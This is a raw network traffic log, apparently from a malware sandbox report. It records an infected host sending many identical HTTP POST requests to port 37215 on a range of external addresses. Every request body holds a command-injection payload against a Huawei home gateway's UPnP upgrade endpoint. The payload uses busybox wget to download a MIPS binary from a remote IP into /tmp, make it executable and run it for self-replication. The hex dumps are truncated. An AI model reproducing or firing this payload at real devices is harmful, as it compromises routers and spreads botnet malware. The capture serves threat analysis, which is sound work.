                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1927192.168.2.2341018197.164.97.19737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.561083078 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1928192.168.2.2356460157.214.213.1937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.561105013 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1929192.168.2.2357966157.167.20.15637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.561114073 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1930192.168.2.236061866.250.84.9437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.561187983 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1931192.168.2.2359270157.23.15.137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.561757088 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1932192.168.2.234042641.247.148.3637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.561779022 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1933192.168.2.2355896157.244.235.22537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.561805964 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1934192.168.2.235458441.25.73.20237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.561842918 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1935192.168.2.2359838157.147.90.14237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.561870098 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1936192.168.2.2353732197.209.143.6137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.561909914 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1937192.168.2.2359254197.184.128.8237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.562470913 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
